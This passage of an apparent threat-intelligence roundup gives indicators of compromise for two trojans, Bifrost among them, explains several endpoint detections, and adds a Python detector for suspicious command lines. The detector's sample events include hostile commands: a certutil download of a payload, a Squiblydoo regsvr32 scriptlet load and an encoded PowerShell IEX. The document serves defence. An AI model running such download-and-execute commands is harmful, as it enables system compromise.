<HKCU>\SOFTWARE\MICROSOFT\BYCUO (Value Name: 1h1dfhha) 1
<HKCU>\SOFTWARE\MICROSOFT\IXIJQO (Value Name: 36d5d0id) 1
<HKCU>\SOFTWARE\MICROSOFT\NEEZ (Value Name: 96jb5ie) 1
<HKCU>\SOFTWARE\MICROSOFT\IXIJQO (Value Name: 1354daf3) 1
<HKCU>\SOFTWARE\MICROSOFT\NEEZ (Value Name: 1ej224cc) 1
<HKCU>\SOFTWARE\MICROSOFT\ENVAM (Value Name: 229cb09e) 1
Mutexes | Occurrences
Global\{C30C6CF2-932B-408E-55BA-04D54CAC27C8} 11
Global\{566D79B0-8669-D5EF-55BA-04D54CAC27C8} 11
Global\{C8D239CA-C613-4B50-55BA-04D54CAC27C8} 11
Global\{C8D239CB-C612-4B50-55BA-04D54CAC27C8} 11
Local\{73DE6ED9-9100-F05C-55BA-04D54CAC27C8} 11
Local\{A9348FD8-7001-2AB6-55BA-04D54CAC27C8} 11
Local\{A9348FDF-7006-2AB6-55BA-04D54CAC27C8} 11
Global\{73DE6ED9-9100-F05C-55BA-04D54CAC27C8} 11
Global\{A5D858EA-A733-265A-55BA-04D54CAC27C8} 11
Global\{A9348FD8-7001-2AB6-55BA-04D54CAC27C8} 11
Global\{A9348FDF-7006-2AB6-55BA-04D54CAC27C8} 11
Local\{C8D239CA-C613-4B50-55BA-04D54CAC27C8} 11
Local\{C8D239CB-C612-4B50-55BA-04D54CAC27C8} 11
Local\{E9745CFB-A322-6AF6-55BA-04D54CAC27C8} 11
Global\{EC526BB1-9F5D-3B52-7F38-97EEB2CD3DDC} 11
Local\{AC12B892-4C7E-7B12-7F38-97EEB2CD3DDC} 11
Global\{866A889B-7C77-516A-7F38-97EEB2CD3DDC} 11
Global\{EC526BB6-9F5A-3B52-7F38-97EEB2CD3DDC} 11
Global\{36B88AB0-7E5C-E1B8-7F38-97EEB2CD3DDC} 11
Global\{E0BEBC83-486F-37BE-7F38-97EEB2CD3DDC} 11
Local\{8DB4DDA2-294E-5AB4-7F38-97EEB2CD3DDC} 11
Global\{130B9DD9-6935-C40B-7F38-97EEB2CD3DDC} 11
Local\{8DB4DDA3-294F-5AB4-7F38-97EEB2CD3DDC} 11
GLOBAL\{<random GUID>} 11
IP Addresses contacted by malware (does not indicate maliciousness) | Occurrences
172[.]217[.]6[.]196 11
194[.]94[.]127[.]98 11
69[.]39[.]74[.]6 11
108[.]211[.]64[.]46 11
64[.]219[.]121[.]189 11
99[.]76[.]3[.]38 11
184[.]77[.]29[.]7 11
189[.]148[.]234[.]112 11
71[.]43[.]217[.]3 9
96[.]57[.]35[.]109 9
71[.]42[.]56[.]253 9
101[.]162[.]73[.]132 9
99[.]122[.]152[.]158 9
66[.]180[.]118[.]226 9
66[.]117[.]77[.]134 7
1[.]186[.]47[.]244 7
13[.]107[.]21[.]200 6
176[.]73[.]85[.]137 6
120[.]151[.]159[.]254 5
204[.]79[.]197[.]200 4
50[.]22[.]46[.]49 4
94[.]68[.]49[.]208 3
94[.]70[.]45[.]182 3
122[.]170[.]68[.]114 3
187[.]25[.]37[.]13 3

*See JSON for more IOCs

Domain Names contacted by malware (does not indicate maliciousness) | Occurrences
cyxaerkijeuaupzhqjzxhkzmrmvxw[.]net 3
gmwgkfjfrcdamydbuucrhxzxqclv[.]org 3
hmnbdanrschumrtouxhmxwhfe[.]biz 3
hseuswtumvofhaugxcbuaskifzp[.]ru 3
hvwuwdellgqcaivwkeqzxhkhyea[.]org 3
knibxwsofqprztzpbyibhpvqcsh[.]ru 3
ldugqylugovtcpfuingawkugnws[.]com 3
llxcijbliflgqhiijivxkvkrcr[.]com 3
mjhhmhrovocqlnkjqkuayhxgvgoj[.]net 3
mvdyheugepjxxdgyxxsuceqv[.]info 3
mzqocmpfltdlirxcqwxwdmb[.]info 3
nbvcqsprcapbymreyvojvteagy[.]org 3
pgdgqxhufexpnfqcedvbaythu[.]com 3
pvyhfypvemoeqhxsgerotsorpsfe[.]ru 3
rshuptpdiypmjovfebcetxkud[.]com 3
soamvwpqwdxougljpjwpfbuzpuky[.]biz 3
tstcfobmbcizlrramfuhwckrn[.]net 3
tvkdezvwqkqclpnxsdapinamd[.]com 3
xgijwozlwbiddyeavkvintxnrv[.]biz 3
xwgbavssggegeubilbnzdpbwkjzt[.]biz 3
jvzxcyfquohmzyotkswskjnbn[.]biz 2
zthqlrtgcexobqkpqkoydheikj[.]org 2
kljvxotcuplskxqwbyizbro[.]org 2
vklfwsfqpbsxvobnzrkxshmrkd[.]com 2
xcpijwuyvktcbmuodykbkbp[.]biz 2

*See JSON for more IOCs

Files and/or directories created | Occurrences
%APPDATA%\<random, matching '[a-z0-9]{3,7}'> 11
%HOMEPATH%\AppData\LocalLow\<random, matching '[a-z]{4,6}.[a-z]{3}'> 11
%APPDATA%\<random, matching '[A-Z][a-z]{3,5}\[a-z]{4,6}'>.exe 11

File Hashes
*See JSON for more IOCs

Coverage

Product | Protection
AMP This has coverage
Cloudlock N/A
CWS This has coverage
Email Security This has coverage
Network Security This has coverage
Stealthwatch N/A
Stealthwatch Cloud N/A
Threat Grid This has coverage
Umbrella This has coverage
WSA This has coverage

Screenshots of Detection (images not reproduced here): AMP, ThreatGrid, MITRE ATT&CK

Win.Trojan.Bifrost-9762706-0

Indicators of Compromise

  • IOCs collected from dynamic analysis of 10 samples
Registry Keys | Occurrences
<HKLM>\SOFTWARE\WOW6432NODE\MICROSOFT\WINDOWS\CURRENTVERSION\RUNONCE (Value Name: wextract_cleanup0) 10
Mutexes | Occurrences
Bif1234 7
Bif123 2
Files and/or directories created | Occurrences
%TEMP%\IXP000.TMP 10
%TEMP%\IXP000.TMP\TMP4351$.TMP 10
%TEMP%\IXP000.TMP\server.exe 7
%ProgramFiles%\Bifrost\server.exe 2
%TEMP%\IXP000.TMP\2.exe 1
%TEMP%\IXP000.TMP\C.exe 1
%TEMP%\IXP000.TMP\Nashy.exe 1

File Hashes

0c7cfdb105207defaace858de7a8ef41901a4e5a74e8c9979d9404d83e224281
1030569e9129cb53086600f621e3a7b63783b5a923be50f6ca37bbd457770a8c
57271aac1488b190544c050c8c85cc9754b09a2d52e6a68391253c8896650206
79c335ad937f152d5e3d00ee75c39ad3abfe346e8b99bea411dd2154b3c8d248
8b539518d084a081d6b6a5706665cc72dd71071e13dc16baf8d74e214c79e0ac
a1bfc3a15fba0c137b35a437c08175ccd538d2f3c0b0d88f638464375f86a687
c4fa768634a7a6a8fcd7e70aabf2977c66f61b6329b15d75d00c0fa23d6d9b9c
c880e5c781c95fa30ee3320e3df2398e5b3121eec412da2aba6e523691159253
d628dd1d65514247d90cd78e0f8a730e2d7fe9a1506b3bdca3ebcc74a6c657a1
d8d8f7680ac056a17693ac03dbadbb02410917a67d8c55ced688fc9039296c8b

Coverage

Product | Protection
AMP This has coverage
Cloudlock N/A
CWS This has coverage
Email Security This has coverage
Network Security This has coverage
Stealthwatch N/A
Stealthwatch Cloud N/A
Threat Grid This has coverage
Umbrella N/A
WSA N/A

Screenshots of Detection (images not reproduced here): AMP, ThreatGrid, MITRE ATT&CK

Exploit Prevention

Cisco AMP for Endpoints protects users from a variety of malware functions with exploit prevention. Exploit prevention helps users defend endpoints from memory attacks commonly used by obfuscated malware and exploits. These exploits use certain features to bypass typical anti-virus software, but were blocked by AMP thanks to its advanced scanning capabilities, even protecting against zero-day vulnerabilities.

Dealply adware detected - (9487)
DealPly is adware that claims to improve your online shopping experience. It is often bundled with otherwise legitimate installers and is difficult to uninstall. It creates pop-up advertisements and injects advertisements into web pages. Adware has also been known to download and install malware.
Process hollowing detected - (4885)
Process hollowing is a technique used by some programs to evade static analysis and to run malicious code under the name of a legitimate process. In typical usage, the malware starts a legitimate program in a suspended state, unmaps (hollows out) the original executable image from the child's address space, writes its own unpacked payload, which was obfuscated or encrypted on disk, into that space, points the child's entry point at the injected code, and then resumes the child's main thread. On disk and in the process list the child still looks like the legitimate program.
Excessively long PowerShell command detected - (4835)
A PowerShell command with a very long command-line argument, which may indicate an obfuscated script, has been detected. PowerShell is an extensible Windows scripting language present on all modern versions of Windows. Malware authors use PowerShell in an attempt to evade security software or other monitoring that is not tuned to detect PowerShell-based threats.
CVE-2019-0708 detected - (1444)
An attempt to exploit CVE-2019-0708 has been detected. The vulnerability, dubbed BlueKeep, is a use-after-free memory corruption in the kernel-mode Remote Desktop Protocol (RDP) driver that can be triggered by sending a specially crafted RDP request. Since it can be triggered without authentication and allows remote code execution, it can be used by worms to spread automatically without human interaction.
Certutil.exe is downloading a file - (988)
The certutil.exe utility has been detected downloading a file, and the downloaded file behaved suspiciously when executed. The normal usage of certutil.exe involves managing certificates and retrieving certificate information. Attackers abuse this signed, built-in utility as a living-off-the-land downloader to retrieve additional malicious payloads.
Smoke Loader detected - (799)
Smoke Loader has been detected. Smoke Loader is used mainly to execute other malicious software, such as ransomware or cryptocurrency miners. Its initial infection vector is usually an email with a malicious Microsoft Word document, or delivery through an exploit kit. Smoke Loader uses various plugins designed to steal data from its victims, particularly credentials stored on the system or transferred over HTTP, HTTPS, FTP, SMTP, POP3 or IMAP.
Squiblydoo application whitelist bypass attempt detected. - (603)
An attempt to bypass application whitelisting via the "Squiblydoo" technique has been detected. This typically involves using regsvr32.exe, a signed Microsoft binary that whitelisting policies usually trust, to load scrobj.dll and execute script content (a .sct scriptlet) hosted on an attacker-controlled server, so that no unapproved executable has to be written to disk.
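
The three behaviours just described (a very long or encoded PowerShell command line, certutil.exe fetching a URL, and regsvr32.exe loading a remote scriptlet through scrobj.dll) all leave their mark in the process command line, so the same checks can be run over process-creation telemetry such as Sysmon event 1 or Windows event 4688. The block below is an added example written for this page, not Cisco's exploit-prevention logic: the rule names, the 1,000-character threshold, the "image | command line" event format and the sample events themselves are constructed for the demo, and the URLs in them are not real.

```python
"""Flag LOLBin command-line patterns behind three of the exploit-prevention events above.

Added example, not Cisco/Talos detection logic. The event format and the
sample events are constructed; the threshold is an assumption to tune.
"""
import base64
import re

LONG_POWERSHELL_THRESHOLD = 1000   # characters; assumption, tune per environment
# PowerShell accepts any unambiguous prefix of -EncodedCommand (-e, -ec, -enc, ...),
# and the payload is base64 of the UTF-16LE script.
ENCODED_RE = re.compile(r"-e(?:c|n[a-z]*)?\s+([A-Za-z0-9+/=]{16,})", re.I)
URL_RE = re.compile(r"https?://\S+", re.I)


def decode_encoded_command(cmdline):
    """Return the decoded script behind an -EncodedCommand argument, or None."""
    m = ENCODED_RE.search(cmdline)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None


def classify(image, cmdline):
    """Return the list of rule names that fire for one process-creation event."""
    exe = image.rsplit("\\", 1)[-1].lower()
    low = cmdline.lower()
    rules = []
    if exe in ("powershell.exe", "pwsh.exe"):
        if len(cmdline) > LONG_POWERSHELL_THRESHOLD:
            rules.append("excessively-long-powershell-command")
        if decode_encoded_command(cmdline) is not None:
            rules.append("powershell-encoded-command")
    elif exe == "certutil.exe":
        # certutil -urlcache -split -f <url> <file> is the classic download form.
        if "-urlcache" in low and URL_RE.search(cmdline):
            rules.append("certutil-download")
    elif exe == "regsvr32.exe":
        # Squiblydoo: regsvr32 /s /n /u /i:<url-to-.sct> scrobj.dll
        if re.search(r"[/-]i:https?://", low) and "scrobj.dll" in low:
            rules.append("squiblydoo-regsvr32")
    return rules


def scan(events):
    """events: iterable of 'image | command line' strings (constructed format)."""
    out = []
    for line in events:
        image, _, cmdline = line.partition(" | ")
        for rule in classify(image.strip(), cmdline.strip()):
            out.append((rule, image.strip()))
    return out


def encode_powershell(script):
    """Build the -EncodedCommand form PowerShell expects (UTF-16LE, then base64)."""
    return base64.b64encode(script.encode("utf-16-le")).decode("ascii")


# Constructed sample events (not real telemetry); URLs are placeholders.
_LONG_SCRIPT = "$p='" + "A" * 800 + "';IEX $p"
SAMPLE_EVENTS = [
    r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | powershell.exe -nop -w hidden -enc "
    + encode_powershell(_LONG_SCRIPT),
    r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | powershell.exe -ExecutionPolicy Bypass -File C:\scripts\backup.ps1",
    r"C:\Windows\System32\certutil.exe | certutil.exe -urlcache -split -f http://example.invalid/payload.txt C:\Users\Public\p.exe",
    r"C:\Windows\System32\certutil.exe | certutil.exe -store My",
    r"C:\Windows\System32\regsvr32.exe | regsvr32.exe /s /n /u /i:http://example.invalid/x.sct scrobj.dll",
    r"C:\Windows\System32\regsvr32.exe | regsvr32.exe /s C:\Program Files\Vendor\control.ocx",
]

if __name__ == "__main__":
    for rule, image in scan(SAMPLE_EVENTS):
        print(rule, image)
```

The decoded script is worth keeping in the alert: a long command line is only a hint, while the decoded content usually shows the download cradle or the next stage directly. The benign events in the sample (an -ExecutionPolicy run of a local script, a certutil -store query, a regsvr32 of a local OCX) are there to show what the rules must not fire on.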
Crystalbit-Apple DLL double hijack detected - (542)
A Crystalbit-Apple DLL double hijack was detected. During this attack, the adversary abuses two legitimate vendor applications, such as those from CrystalBit and Apple, as part of a DLL double-hijack attack chain that starts with a fraudulent software bundle and eventually leads to a persistent miner and, in some cases, spyware deployment.
Installcore adware detected - (262)
InstallCore is an installer that bundles legitimate applications with offers for additional third-party applications that may be unwanted. The unwanted applications are often adware that displays advertising in the form of pop-ups or by injecting into browsers and adding or altering advertisements on web pages. Adware is known to sometimes download and install malware.
Kovter injection detected - (138)
A process was injected into, most likely by an existing Kovter infection. Kovter is a click-fraud trojan that can also act as an information stealer. Kovter is also fileless malware, meaning the malicious DLL is stored inside the Windows registry and injected directly into memory using PowerShell. It can detect and report the usage of monitoring software such as Wireshark and sandboxes to its C2. It spreads through malicious advertising and spam campaigns.